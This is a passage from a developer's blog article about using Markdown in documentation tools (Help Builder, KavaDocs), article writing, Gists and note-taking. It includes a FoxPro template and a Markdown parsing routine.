<% Layout="~/templates/_Layout.wcs" %><h1 class="content-title"><img src="bmp/<%= TRIM(LOWER(oHelp.oTopic.Type))%>.png"><%= iif(oHelp.oTopic.Static,[<img src="bmp/static.png" />],[]) %><%= EncodeHtml(TRIM(oHelp.oTopic.Topic)) %></h1><div class="content-body" id="body"><%= oHelp.FormatHTML(oHelp.oTopic.Body) %></div><% IF !EMPTY(oHelp.oTopic.Remarks) %><h3 class="outdent" id="remarks">Remarks</h3><blockquote>        <%= oHelp.FormatHTML(oHelp.oTopic.Remarks) %></blockquote><% ENDIF %>  <% IF !EMPTY(oHelp.oTopic.Example) %><h3 class="outdent" id="example">Example</h3><%= oHelp.FormatExample(oHelp.oTopic.Example)%><% ENDIF %>   <% if !EMPTY(oHelp.oTopic.SeeAlso) %><h3 class="outdent" id="seealso">See also</h3><%= lcSeeAlsoTopics %><%  endif %>

These templates are customizable by the user.

The key items to not here is the oHelp.FormatHtml() function which is responsible for turning the content of a specific multi-line field into HTML. There are several formats with Markdown being the newest addition.

***********************************************************************
* wwHelp :: FormatHtml
*********************************
LPARAMETER lcHTML, llUnformat, llDontParseTopicLinks, lnViewMode
LOCAL x, lnRawHTML, lcBlock, llRichEditor, lcText, lcLink, lnRawHtml

IF EMPTY(lnViewMode)
  IF VARTYPE(this.oTopic) == "O"
     lnViewMode = this.oTopic.ViewMode
  ELSE
     lnViewMode = 0
  ENDIF     
ENDIF

*** MarkDown Mode
IF lnViewMode = 2 
   IF TYPE("poMarkdownParser") # "O"
      poMarkdownParser = CREATEOBJECT("wwHelpMarkDownParser")
      poMarkdownParser.CreateParser(.t.,.t.)
   ENDIF
   RETURN poMarkdownParser.Parse(lcHtml, llDontParseTopicLinks)
ENDIF  

IF lnViewMode = 1
   RETURN lcHtml
ENDIF

IF lnViewMode = 0 OR lnViewMode = 1
	loParser = CREATEOBJECT("HelpBuilderBodyParser")	
	RETURN loParser.Parse(lcHtml, llDontParseTopicLinks)
ENDIF

RETURN "Invalid ViewMode"
* EOF FixNoFormat

As I showed earlier in the Message Board sample, here again I use the Markdig parser, but in this case there's some additional logic built ontop of the base Markdown parser that deals with Help Builder specific directives and formatting options. wwHelpMarkdownParser extends MarkdownParserExtended to do this.

As before the parser is cached so if the instance exists it doesn't have to be created again for performance. Each topic can have up to 5 Markdown sections so reuse is an important performance point. The template renders HTML output into a local file, which is then displayed in the preview on the left in a Web Browser control.

Output generation varies depending on whether you're previewing which generates a local file that is previewed from disk. Online there's a full HTML UI that surrounds each topic and provides for topic navigation:

The online version is completely static, so the Markdown to HTML generation actually happens during build time of the project. Once generated you end up with a static HTML Web site that can just be uploaded to a Web server.

KavaDocs

KavaDocs is another documentation project I'm working on with Markus Egger. It also uses Markdown but the concept is very different and relies on Markdown files on disk and online in a Git repository. There are two components to this tool. One is a local Markdown Monster Addin that basically provides project features to tie together the Markdown files that otherwise just exist on disk. The KavaDocs Addin provides a table of contents and hierarchy and some base information about topics. Most of the topic related information is actually stored inside of the topic files as YAML data.

Files are stored and edited as plain Markdown files with topic content stored inside each of the topics. The Table of Contents contains the topics list to tie the individual topics together along with a few bits of other information like keywords, categories, related links and so on.

The other part to KavaDocs is an online application. It's a SAAS application that can serve this Markdown based documentation content dynamically via a generic Web service interface. You create a Web site like markdownmonster.kavadocs.com which then serves the documentation directly from a Github repository using a number of different nicely formatted and real-time switchable themes.

The concept here is very different in that the content is entirely managed on disk via plain Markdown files. The table of content pulls the project information together, and Git serves as the distribution mechanism. The Web site provides the front end while Git provides the data store.

The big benefit for this solution is that it's easy to collaborate. Since all documentation is done as Markdown text it's easy to sync changes on Git and any changes merged into the master branch are immediately visible as soon as a change is made. It's a really quick way to get documentation online.

White Papers and Articles like this one

These days I much prefer to write everything I can in Markdown. However, for articles for print or even some online magazines, the standard for documents continues to be Microsoft Word mainly because the review process in Word is well defined.

However, I like to write my original document with Markdown because I simply have a more efficient workflow writing this way, with real easy ways to capture images and paste them into documents for example. Markdown Monster's image pasting feature also copies files to disk and optimizes them, and it's just huge time saver as is the built in image capture integration using either SnagIt or a built-in capture. Linking to Web content too is much quicker with Markdown as is dealing with often frequently changing code snippets for technical articles. Belive me when I say that using Markdown can shave hours of document creation for me compared to using Word.

So for publications I often write in Markdown and then export the document to Word either using HTML rendering and importing the HTML, or by using PanDoc which is the Swiss Army knife of document conversions to convert my Markdown directly to Word or PDF. PDF conversions can be very good as you can see the Markdown Monster generated PDF output of the original document for this article here. Conversions to MS Word are usually good, but they do need adjustments for the often funky paragraph formatting required for publishers. Even with that step writing in Markdown plus document fixing is usually easier than writing in Word.

The other advantage of this approach is that once the document is in Markdown I can reuse the document much more easily. If you've ever written a Word document and then tried to publish that Word document on the Web, you know what a hot mess Microsoft Word HTML is. It works but the documents are huge and basically become uneditable as HTML.

With a document written in Markdown I can convert my doc to Word to push and do a quick edit/cleanup run before pushing to my publisher, but I can then turn around and use the same Markdown and publish it on my blog, submit the PDF to conference and also make it available on GitHub for editing. I can also use the page handler I described earlier to simply drop the Markdown file plus the images into a folder on my Web site.

IOW, Markdown makes it much easier to reuse the content you create because it is just text and inherently more portable.

Generic Markdown Usage

Once you get the Markdown bug you'll find a lot of places where you can use Markdown. I love using Markdown for Notes, ToDo lists, keeping track client info, call logs, quick time tracking and other stuff.

here are a few examples.

Using Gists to publish Markdown Pages

Github has a related site that allows you to publish individual code snippets for sharing. Github Gist is basically a mini Git repository that holds one or more files that you can quickly post and share. It's great for sharing a code snippet on Twitter or other social network that you can then link to from a Tweet for example.

Gists are typically named as files and the file extension determines what kind of syntax coloring is applied to the snippet or snippet(s). One of the supported formats is Markdown which makes it possible to easily create Gists and write and publish an entire article.

publishing of Gists, which are essentially mini documents that can be posted as Code snippets on the Web. It's an easy way to share code snippets or even treat it like a simple micro blogging platform:

Gists can be shared via URL, and can also be retrieved via a simple REST API.

For example, Markdown Monster allows you to open a document from Gist using Open From Gist. You can edit the document in the local editor, then post it back to the Gist which effectively updates it. All this happens through two very simple JSON REST API calls.

One fly in the oinment to this approach is that images have to be linked as absolute Web URLs because there's no facility to upload images as part of a Gist. You can upload images to a Github image repo, Azure Blob storage or some similar mechanism to create your images as absolute URLs.

I love posting Gists for Code Samples. Although gists support posting specific language files (like foxpro or csharp files) I much rather post a Markdown document that includes the code and then describe more info around the code snippet.

Markdown for Everything? No!

Ok, so I've been touting Markdown as pretty awesome and I really think it addresses many of the issues I've had over the years of writing for publications, writing documentation or simply keeping track of things. Using Markdown has made me more productive for many text editing tasks.

But at the same time there are limits to what you can effectively do with Markdown at least to date. For magazine articles I still tend to need to use Word. Although I usually write my articles using Markdown, I usually have to convert them to a Word document (which BTW is easy via HTML conversion or even using a tool like PanDoc to convert Markdown to Word). The reason is that my editors work with Word and when all is said and done Word's Document Writer Review and Comparision are second to none. While you can certainly do change tracking and multi-user syncing by using Markdown with Git, it's not anywhere as smooth as what's built into Word.

There are other things that Markdown is not good for. When talking about HTML, Markdown addresses bulk text editing needs nicely. If you're editing an About page or Privacy Policy, Sales page etc. Markdown is much easier than HTML to get into the page. Even larger blocks of Html Text inside of larger HTML documents are a good fit for Markdown using what I call Markdown Islands. But Markdown is not a replacement for full HTML layout. You're not going to replace entire Web sites using just Markdown - you still need raw HTML for layout and overall site behavior.

In short, make sure you understand what you're using Markdown for and whether that makes sense. I think it's fairly easy to spot the edges where Markdown usage is not the best choice and also where it is. If you're dealing with mostly text data Markdown is probably a good fit. Know what works...

Markdown for Notes and Todo Lists

In addition to application related features, I've also found Markdown to be an excellent format for note taking and general notes. It's easy to create lists with Markdown text, so it's easy to open up a Markdown document and just fire away.

Here are some things I keep in Markdown:

General Notes

  • General Todo List
  • Phone Call Notes Document

Client Specific Notes

  • Client specific Notes
  • Client specific Work Item List
  • Client Logins/Account information (using MM Encrypted Files)

Shared Content - DropBox/OneDrive

  • Clipboard.md - machine sharable clipboard

Shared Access: DropBox or Git

First off I store most of my notes and todo items in shared folders of some sort. For my personal notes and Todo lists they are stored on DropBox in a custom Notes folder which has task specific sub-folders.

For customers I tend to store my public notes in Git repositories along with the source code (in a Documentation or Administration folder usually). Private notes I keep in my DropBox Notes folder.

Markdown Monster Favorites

Another super helpful feature in Markdown Monster that I use a lot is the Favorites feature. Favorites lets me pin individual Markdown documents like my Call Log and ToDo list or an entire folder on the searchable Favorites tab. This makes it very quick to find relevant content without keeping a ton of Markdown documents open all the time.

Summary

Markdown is simple tech which at the surface seems like a throwback to earlier days of technology. But - to me at least - the simpler technology actually means better productivity and much better control over the document format. The simplicity of text means I get a fast editor, easy content focused editing and as an extra bonus as a developer I get the opportunity to hack on Markdown with code. It's just text so it's easy to handle custom syntax or otherwise manipulate the Markdown document.

In fact, I went overboard on this and created my own Markdown Editor because frankly the tooling that has been out there for Windows really sucked. Markdown Monster is my vision of how I want a Markdown Editor to work. I write a lot and so a lot of first hand writing experience and convenience is baked into this editor and the Markdown processing that happens. If I was dealing with a proprietary format like Word, or even with just HTML, none of that would be possible. But because Markdown is just text there are lots of opportunities to manipulate both the Markdown itself in terms of (optional) UI editing experience as well the output generation. It's truly awesome what is possible.

this post was created and published withMarkdown Monster

Resources

Viewing all 133 articles
Browse latest View live